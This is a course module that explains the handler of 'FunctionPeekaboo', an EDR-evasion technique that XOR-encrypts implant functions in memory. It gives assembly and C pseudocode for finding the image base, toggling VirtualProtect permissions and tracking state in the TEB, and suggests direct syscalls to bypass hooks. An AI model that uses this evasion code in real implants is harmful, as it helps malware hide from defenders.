Module 6: The Handler & XOR Engine
The ~380-byte core routine that performs memory permission changes, PE header parsing, and byte-level XOR encryption/decryption.
Module Objective
Deep dive into the handler — the shared routine called by every prologue and epilogue stub. Understand its PE header validation logic, .funcmeta section traversal, VirtualProtect permission transitions (RX → RW → RX), byte-level XOR implementation, and the TEB UserReserved field usage for per-thread state management via the GS segment register.
1. Handler Overview
The handler is a single shared routine (~380 bytes) called by every prologue and epilogue stub. It receives two arguments:
| Parameter | Register | Description |
|---|---|---|
| Function Pointer | RCX | Pointer to the function body that needs to be encrypted or decrypted |
| Operation Flag | RDX | 0 = decrypt (called from prologue), 1 = encrypt (called from epilogue) |
The handler’s job is to:
Handler Steps
- Find the PE image base by walking backward from the handler’s own address to find the MZ header
- Parse PE headers to locate the
.funcmetasection - Search
.funcmetaentries to find the metadata for the target function (matching by RVA) - Check the
IsEncryptedflag to determine if the requested operation is valid - Call
VirtualProtectto change the function’s memory to RW (writable) - XOR the function body bytes with the stored key
- Call
VirtualProtectto restore RX (executable) permissions - Update the
IsEncryptedflag in.funcmeta - Update TEB UserReserved fields to track the currently active function
2. Finding the Image Base
The handler needs to find the PE image base to locate the section headers. Since ASLR randomizes the load address, the handler uses a backward-scanning technique:
x86-64 Assembly; Find image base by scanning backward from current address
; PE images are aligned to 64KB boundaries (0x10000)
find_image_base:
; Start from the handler's own address (known from CALL/POP)
mov rax, handler_address
and rax, 0xFFFFFFFFFFFF0000 ; Align down to 64KB boundary
.scan_loop:
; Check for MZ signature at this address
cmp word ptr [rax], 0x5A4D ; "MZ" in little-endian
je .found_mz
sub rax, 0x10000 ; Move back 64KB
jmp .scan_loop
.found_mz:
; RAX = image base
; Validate: check PE signature
mov ecx, dword ptr [rax + 0x3C] ; e_lfanew (offset to PE header)
cmp dword ptr [rax + rcx], 0x4550 ; "PE\0\0"
jne .scan_loop ; Not a valid PE, keep scanning
; Valid PE found - RAX = ImageBase
Why Not Use GetModuleHandle?
Calling GetModuleHandle(NULL) would be simpler, but it requires importing the function from kernel32.dll. The handler is designed to be import-free where possible, reducing the API footprint visible to EDR. The backward MZ scan is a well-known technique used in shellcode and reflective loaders — it works because the Windows PE loader maps executables at 64KB-aligned boundaries.
3. PE Header Traversal
Once the image base is found, the handler parses the PE headers to locate the .funcmeta section:
x86-64 Assembly; Navigate PE headers to find .funcmeta section
; RAX = ImageBase (from step 2)
parse_pe:
mov ecx, [rax + 0x3C] ; e_lfanew
lea rdx, [rax + rcx] ; RDX = PE signature address
; PE signature at [RDX+0] = "PE\0\0"
; COFF header at [RDX+4] (20 bytes)
; Optional hdr at [RDX+24] (variable size)
; Get number of sections
movzx ecx, word ptr [rdx + 6] ; NumberOfSections
; Get size of optional header
movzx r8d, word ptr [rdx + 20] ; SizeOfOptionalHeader
; First section header starts after optional header
lea r9, [rdx + 24 + r8] ; R9 = first IMAGE_SECTION_HEADER
; Iterate section headers (40 bytes each)
.section_loop:
; Compare section name with ".funcmeta"
; Section name is 8 bytes at [R9+0]
cmp dword ptr [r9], 0x6E75662E ; ".fun" in little-endian
jne .next_section
cmp dword ptr [r9 + 4], 0x74656D63 ; "cmet" in little-endian
je .found_funcmeta
.next_section:
add r9, 40 ; sizeof(IMAGE_SECTION_HEADER)
dec ecx
jnz .section_loop
ret ; .funcmeta not found (shouldn't happen)
.found_funcmeta:
; R9 = pointer to .funcmeta section header
mov ecx, [r9 + 12] ; VirtualAddress (RVA)
lea rsi, [rax + rcx] ; RSI = .funcmeta data in memory
4. .funcmeta Entry Lookup
The .funcmeta section is a flat array of entries. The handler searches for the entry matching the target function (whose address was passed in RCX by the stub):
x86-64 Assembly; Search .funcmeta for the target function
; RSI = .funcmeta data pointer
; RCX = target function body address (from stub)
; RAX = ImageBase
search_funcmeta:
; Convert target address to RVA
sub rcx, rax ; RCX = function RVA
.entry_loop:
; Each entry: [4B RVA][4B Size][1B Key][1B IsEncrypted][2B Pad]
mov edi, [rsi] ; Entry's FunctionRVA
test edi, edi ; NULL terminator?
jz .not_found ; Shouldn't happen for valid calls
cmp edi, ecx ; Compare with target RVA
je .found_entry
add rsi, 12 ; Next entry (12 bytes per entry)
jmp .entry_loop
.found_entry:
; RSI points to the matching entry
; [RSI+0] = FunctionRVA (DWORD)
; [RSI+4] = FunctionSize (DWORD)
; [RSI+8] = XorKey (BYTE)
; [RSI+9] = IsEncrypted (BYTE)
; [RSI+10] = Reserved (WORD)
5. VirtualProtect Permission Changes
Before XOR-ing the function body, the handler must change memory permissions. The function’s .text section is normally PAGE_EXECUTE_READ (RX), which prevents writing. The handler toggles to PAGE_READWRITE (RW) for the XOR operation, then back to PAGE_EXECUTE_READ after:
C (Pseudocode)// Permission change sequence in the handler
void handler(void* func_body, int operation) {
FUNC_META_ENTRY* entry = find_entry(func_body);
DWORD oldProtect;
// Step 1: Change to RW (writable, non-executable)
VirtualProtect(
func_body,
entry->FunctionSize,
PAGE_READWRITE, // 0x04
&oldProtect // Saves previous protection (PAGE_EXECUTE_READ)
);
// Step 2: XOR the function body
xor_memory(func_body, entry->FunctionSize, entry->XorKey);
// Step 3: Restore to RX (executable, non-writable)
VirtualProtect(
func_body,
entry->FunctionSize,
PAGE_EXECUTE_READ, // 0x20
&oldProtect
);
// Step 4: Update state
entry->IsEncrypted = !entry->IsEncrypted;
}
VirtualProtect is the Main Detection Surface
VirtualProtect is a well-monitored API. EDR products hook it to detect memory permission changes (a classic indicator of shellcode injection and sleep obfuscation). The per-function granularity of FunctionPeekaboo means many small VirtualProtect calls rather than one large one, which could be either harder or easier to detect depending on the EDR’s heuristics. An advanced implementation might use NtProtectVirtualMemory syscalls directly to bypass user-mode hooks.
6. The XOR Engine
The actual encryption/decryption is a simple byte-level XOR loop. Since XOR is its own inverse, the same operation encrypts and decrypts:
x86-64 Assembly; XOR engine - encrypt or decrypt function body
; RDI = pointer to function body
; ECX = function body size (bytes)
; AL = XOR key
xor_engine:
test ecx, ecx
jz .xor_done
.xor_loop:
xor byte ptr [rdi], al ; XOR single byte
inc rdi ; Next byte
dec ecx ; Decrement counter
jnz .xor_loop
.xor_done:
ret
This is intentionally simple. The loop processes one byte at a time, which is not the fastest possible implementation but is the smallest and most reliable. Optimization options include:
| Optimization | Approach | Trade-off |
|---|---|---|
| 8-byte blocks | Broadcast XOR key to 8 bytes, XOR QWORD at a time | 8x faster, slightly more code, alignment handling needed |
| SSE/AVX | Use PXOR with 16/32/64-byte vectors | 16-64x faster, much more code, register save overhead |
| REP STOSB variant | Use string operations with XOR | Simple but no direct REP XOR instruction exists |
Why Byte-by-Byte?
Function bodies vary in size and are not guaranteed to be aligned to any particular boundary. A byte-by-byte loop handles all sizes correctly without alignment checks. For typical function sizes (hundreds to low thousands of bytes), the performance difference between byte-by-byte and QWORD XOR is microseconds — negligible compared to the VirtualProtect syscall overhead.
7. TEB UserReserved Fields
The Thread Environment Block (TEB) contains three UserReserved PVOID fields at offsets 0x1478, 0x1480, and 0x1488 (on x86-64 Windows). These fields are reserved for application use — Windows does not use them, making them ideal for per-thread state storage:
x86-64 Assembly; Access TEB via GS segment register (x86-64 Windows)
; GS:[0x30] = pointer to TEB itself (self-reference)
; GS:[0x1478] = UserReserved[0]
; GS:[0x1480] = UserReserved[1]
; GS:[0x1488] = UserReserved[2]
; FunctionPeekaboo uses these for per-thread tracking:
; UserReserved[0] = pointer to currently active (decrypted) function body
; UserReserved[1] = operation flags / recursion counter
; In the handler - update active function tracking:
update_teb:
; On decrypt (prologue): store function pointer
mov qword ptr gs:[0x1478], rcx ; Store active function ptr
; On encrypt (epilogue): clear active function pointer
mov qword ptr gs:[0x1478], 0 ; No function currently active
Why TEB and Not a Global Variable?
A global variable would work for single-threaded implants, but most C2 implants are multithreaded (handling multiple tasks concurrently). The TEB is per-thread, so each thread can independently track which function it is currently executing. This prevents thread A’s function state from interfering with thread B’s function state.
8. GS Segment Register on Windows x64
On x86-64 Windows, the GS segment register points to the TEB for the current thread. The processor swaps GS on context switches, so GS:[offset] always refers to the current thread’s TEB:
| GS Offset | TEB Field | Purpose |
|---|---|---|
GS:[0x00] | ExceptionList | SEH chain |
GS:[0x08] | StackBase | Stack top |
GS:[0x10] | StackLimit | Stack bottom |
GS:[0x30] | Self | TEB self-pointer |
GS:[0x48] | ProcessId | PID |
GS:[0x50] | ThreadId | TID |
GS:[0x60] | ProcessEnvironmentBlock | PEB pointer |
GS:[0x1478] | UserReserved[0] | FunctionPeekaboo: active function ptr |
GS:[0x1480] | UserReserved[1] | FunctionPeekaboo: flags |
GS:[0x1488] | UserReserved[2] | FunctionPeekaboo: reserved |
GS vs FS
On x86-64 Windows, GS points to the TEB. On x86-32, it was FS. This is a common source of confusion. FunctionPeekaboo targets x86-64 and uses GS exclusively. On Linux, the segment register usage is reversed (FS for TLS on x86-64), but FunctionPeekaboo is Windows-specific.
9. Complete Handler Pseudocode
C (Pseudocode)// Complete handler logic (~380 bytes compiled)
void __fastcall handler(void* func_body_ptr, uint64_t operation) {
// 1. Find image base (backward MZ scan)
uintptr_t base = find_image_base();
// 2. Parse PE headers to find .funcmeta
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
IMAGE_SECTION_HEADER* sections = IMAGE_FIRST_SECTION(nt);
FUNC_META_ENTRY* meta = NULL;
for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
if (memcmp(sections[i].Name, ".funcmeta", 8) == 0) {
meta = (FUNC_META_ENTRY*)(base + sections[i].VirtualAddress);
break;
}
}
// 3. Find matching entry
uintptr_t func_rva = (uintptr_t)func_body_ptr - base;
while (meta->FunctionRVA != 0) {
if (meta->FunctionRVA == func_rva)
break;
meta++;
}
// 4. Validate operation
if (operation == 0 && !meta->IsEncrypted)
return; // Already decrypted, skip
if (operation == 1 && meta->IsEncrypted)
return; // Already encrypted, skip
// 5. Change permissions to RW
DWORD old;
VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_READWRITE, &old);
// 6. XOR the function body
uint8_t* bytes = (uint8_t*)func_body_ptr;
for (DWORD i = 0; i < meta->FunctionSize; i++) {
bytes[i] ^= meta->XorKey;
}
// 7. Restore permissions to RX
VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_EXECUTE_READ, &old);
// 8. Update metadata
meta->IsEncrypted = !meta->IsEncrypted;
// 9. Update TEB tracking
if (operation == 0) { // decrypt
__writegsqword(0x1478, (uint64_t)func_body_ptr);
} else { // encrypt
__writegsqword(0x1478, 0);
}
}
10. Handler as Position-Independent Code
The handler itself must be position-independent. It cannot contain absolute addresses or rely on the import table (since it runs before the CRT initializes imports in some configurations). The only external dependency is VirtualProtect from kernel32.dll, which can be resolved via:
VirtualProtect Resolution Options
- PEB walking: Traverse PEB → Ldr → InMemoryOrderModuleList to find kernel32.dll, then parse its export table for VirtualProtect
- IAT reuse: If the main binary already imports VirtualProtect, use the IAT entry (already resolved by the loader)
- Hardcoded syscall: Call
NtProtectVirtualMemorywith the system call number directly, bypassing kernel32/ntdll entirely
The PoC uses the IAT approach for simplicity. A production implementation (like Nighthawk) would likely use direct syscalls.
Knowledge Check
Q1: How does the handler find the PE image base at runtime?
Q2: Why does FunctionPeekaboo use TEB UserReserved fields instead of global variables?
Q3: What is the primary detection surface of the handler?